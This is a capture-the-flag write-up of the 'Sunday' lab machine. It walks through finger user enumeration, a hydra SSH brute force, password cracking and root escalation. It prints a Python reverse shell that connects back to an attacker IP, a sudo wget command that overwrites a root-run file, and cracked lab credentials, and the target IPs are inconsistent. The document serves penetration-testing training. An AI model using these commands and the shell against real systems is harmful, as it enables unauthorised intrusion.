SUNDAY

Burak Dirlik
4 min readJul 2, 2024

The target IP is 10.129.32.188. Let's start with a default script and version scan plus OS detection:


nmap -sC -sV -O -T4 -oN nmap.txt 10.129.32.188

Let's run a more thorough scan against the open ports that were found (79, 111 and 515); it turns up nothing new.

nmap -p 79,111,515 -sV -oA full-scripts 10.129.32.188

Port 79 is running the finger service.

First, we check whether any users are currently logged in (a finger query with an empty username lists active sessions).

I looked at pentestmonkey for anything related to the finger service.

There is a user-enumeration tool there named finger-user-enum.

Usage:

./finger-user-enum.pl -U /home/kali/Downloads/Seclist-master/Usernames/Names/names.txt -t 10.129.32.188

Now we can compare the results of finger for a name that exists and one that doesn’t:
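To make that comparison concrete, here is a small finger (RFC 1288) client with the "does this login exist?" decision that finger-user-enum automates. It is an added example for this writeup, not pentestmonkey's tool and not code from the original post. The "???" heuristic and the two canned replies are assumptions about how the Solaris finger daemon on this box answers, which is exactly why you calibrate against one name you know exists and one you know does not before trusting a wordlist run.

```python
#!/usr/bin/env python3
"""Minimal finger (RFC 1288) client plus the login-exists check.

Added example; not finger-user-enum and not code from the original post.
The '???' heuristic and the sample replies below are assumptions about the
Solaris finger daemon on this box. Calibrate with a known-good and a
known-bad name before trusting a wordlist run.
"""
import socket

FINGER_PORT = 79  # finger listens on TCP/79, as the nmap scan showed


def finger_query(host, name, port=FINGER_PORT, timeout=5.0):
    """Send one finger request (the name followed by CRLF; an empty name
    asks for the session list) and return the raw reply. Real network I/O."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(f"{name}\r\n".encode())
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")


def user_exists(reply):
    """Classify a reply: True (known login), False (unknown), None (no rows)."""
    if "no such user" in reply.lower():  # Linux-style finger refusal
        return False
    rows = [l for l in reply.splitlines() if l.strip() and not l.startswith("Login")]
    if not rows:
        return None
    # Assumption: Solaris finger prints '???' in the Name column for a login
    # it cannot resolve, while a real account shows its gecos name there.
    return not any("???" in row for row in rows)


def enumerate_users(host, names, query=finger_query):
    """Return the names the daemon recognises. `query` is injectable so the
    decision logic can be exercised offline against canned replies."""
    return [n for n in names if user_exists(query(host, n)) is True]


# Constructed sample replies, modelled on what finger on this box returns.
SAMPLE_KNOWN = (
    "Login       Name               TTY         Idle    When    Where\n"
    "sunny    sunny                 pts/2      <Apr 24, 2018> 10.10.16.3\n"
)
SAMPLE_UNKNOWN = (
    "Login       Name               TTY         Idle    When    Where\n"
    "nosuchuser            ???\n"
)


def offline_demo():
    """Run the enumerator against the canned replies instead of the network."""
    def canned(host, name):
        if name in ("sunny", "sammy"):
            return SAMPLE_KNOWN.replace("sunny", name)
        return SAMPLE_UNKNOWN
    return enumerate_users("10.129.32.188", ["root", "sunny", "bob", "sammy"], query=canned)


if __name__ == "__main__":
    print(offline_demo())
    # Live use: enumerate_users("10.129.32.188", open("names.txt").read().split())
```

Against a live host, swap `canned` for the default `finger_query`; the per-name request is the same thing finger-user-enum.pl sends, just without its threading and reporting.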

Since we have no indication of a password, we can try to brute-force SSH, which on this box listens on the non-standard port 22022 rather than 22, with the following command:

hydra -V -I -l sunny -P '/usr/share/wordlists/rockyou.txt' 10.129.32.188 ssh -s 22022

The brute force finishes with a valid credential pair:

sunny:sunday

SSH connection:

ssh -p 22022 sunny@10.129.32.188

I cannot read user.txt as sunny, so we need to escalate privileges.

But I can read /etc/passwd, and it contains password hashes for sammy and sunny.

We need to crack these hashes to recover the passwords. I am using hashcat.

We got the passwords:

sammy:cooldude!
sunny:sunday

With sammy's password I can now read user.txt.

Let's see which commands we can run as root with sudo -l.

We observe the following from the sudo -l output:

  • The user sunny is allowed to execute /root/troll as root.
  • The user sammy is allowed to run wget as root, which lets him write to any file, including files owned by root, via wget's -O option.

To exploit this, we'll leverage sammy's sudo privileges to overwrite /root/troll with a reverse shell. Then, using sunny's sudo privileges, we'll execute /root/troll to get a root shell.

Target IP: 10.10.10.76 (note the target address differs from the earlier scans)
Attacker IP: 10.10.16.3 (this is the address hard-coded into shell.py)

shell.py:

#!/usr/bin/python
# Reverse shell: connects back to the attacker's netcat listener on
# 10.10.16.3:444 and hands it an interactive /bin/sh. Because this file is
# written over /root/troll and run via sudo, the shell comes back as root.

import socket
import subprocess
import os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.16.3", 444))   # attacker IP and listener port (e.g. nc -lvnp 444)
os.dup2(s.fileno(), 0)           # stdin  -> socket
os.dup2(s.fileno(), 1)           # stdout -> socket
os.dup2(s.fileno(), 2)           # stderr -> socket
p = subprocess.call(["/bin/sh", "-i"])

Command executed as sammy (it overwrites /root/troll with shell.py, which is served from a web server on the attacker machine on port 4444; wget -O truncates and rewrites the existing file in place, so /root/troll keeps its execute bit and the shebang line makes it run as a Python script):

sudo wget http://10.10.16.3:4444/shell.py -O /root/troll

Then, as sunny:

sudo /root/troll

These two commands have to be run one right after the other, because /root/troll is reset to its original content every 5 seconds, so we have only a short window to obtain the shell. Once it runs, the shell connects back to the netcat listener as root and we can read the root flag.
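Because the 5-second reset makes this a timing problem rather than a one-shot exploit, it is worth seeing the race itself. The following is an added example for this writeup, not code from the original post: it reproduces the scenario with an unprivileged temp file, a thread playing the root job that restores the original, one function per user, and a polling loop on the sunny side in place of fast typing. Paths, periods and the marker string are assumptions for the simulation; the reverse shell is replaced by an echo so it runs offline.

```python
#!/usr/bin/env python3
"""Offline simulation of the /root/troll race from this writeup.

Added example, not code from the original post. On the box a root job
restores /root/troll every 5 seconds, so sammy's overwrite
(sudo wget ... -O /root/troll) and sunny's execution (sudo /root/troll)
must both land inside one reset window. A temp file plays /root/troll,
a thread plays the reset job, and the runner loops instead of hoping.
Paths, periods and the marker string are assumptions for the simulation.
"""
import os
import subprocess
import tempfile
import threading
import time

ORIGINAL = "#!/bin/sh\necho 'troll: nothing to see here'\n"
MARKER = "PAYLOAD_EXECUTED"
# Stands in for shell.py from the post; a real run would drop a reverse shell.
PAYLOAD = f"#!/bin/sh\necho {MARKER}\n"


def write_file(path, content):
    with open(path, "w") as f:
        f.write(content)


class Resetter(threading.Thread):
    """Plays the root job: every `period` seconds, put the original back."""

    def __init__(self, path, period):
        super().__init__(daemon=True)
        self.path, self.period = path, period
        self.stop = threading.Event()

    def run(self):
        # Event.wait returns False on timeout (keep resetting), True once stopped.
        while not self.stop.wait(self.period):
            write_file(self.path, ORIGINAL)


def overwrite(path):
    """sammy's step: `sudo wget http://ATTACKER:4444/shell.py -O /root/troll`."""
    write_file(path, PAYLOAD)


def run_target(path):
    """sunny's step: `sudo /root/troll`. True if the payload is what ran."""
    out = subprocess.run(["/bin/sh", path], capture_output=True, text=True).stdout
    return MARKER in out


def run_until_payload(path, attempts, delay):
    """Keep executing the file; return the attempt index on success, else -1."""
    for i in range(attempts):
        if run_target(path):
            return i
        time.sleep(delay)
    return -1


def race(period=5.0, start_delay=0.0, poll=0.05, timeout=2.0):
    """Full scenario. `start_delay` is how long sunny waits after sammy's
    overwrite before executing; anything past `period` loses the race."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "troll")
        write_file(path, ORIGINAL)          # state before the attack
        resetter = Resetter(path, period)
        resetter.start()
        overwrite(path)                     # sammy fires wget
        time.sleep(start_delay)             # sunny reacts after this long
        result = run_until_payload(path, attempts=max(1, int(timeout / poll)), delay=poll)
        resetter.stop.set()
        resetter.join()
        return result


if __name__ == "__main__":
    print("inside the window:", race(period=5.0, start_delay=0.0))
    print("too slow:", race(period=0.5, start_delay=1.5, timeout=0.5))
```

On the real box the same idea means starting a loop of `sudo /root/troll` in sunny's session first and only then firing the wget as sammy, so the execution lands within milliseconds of the overwrite instead of depending on how fast you can switch terminals.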
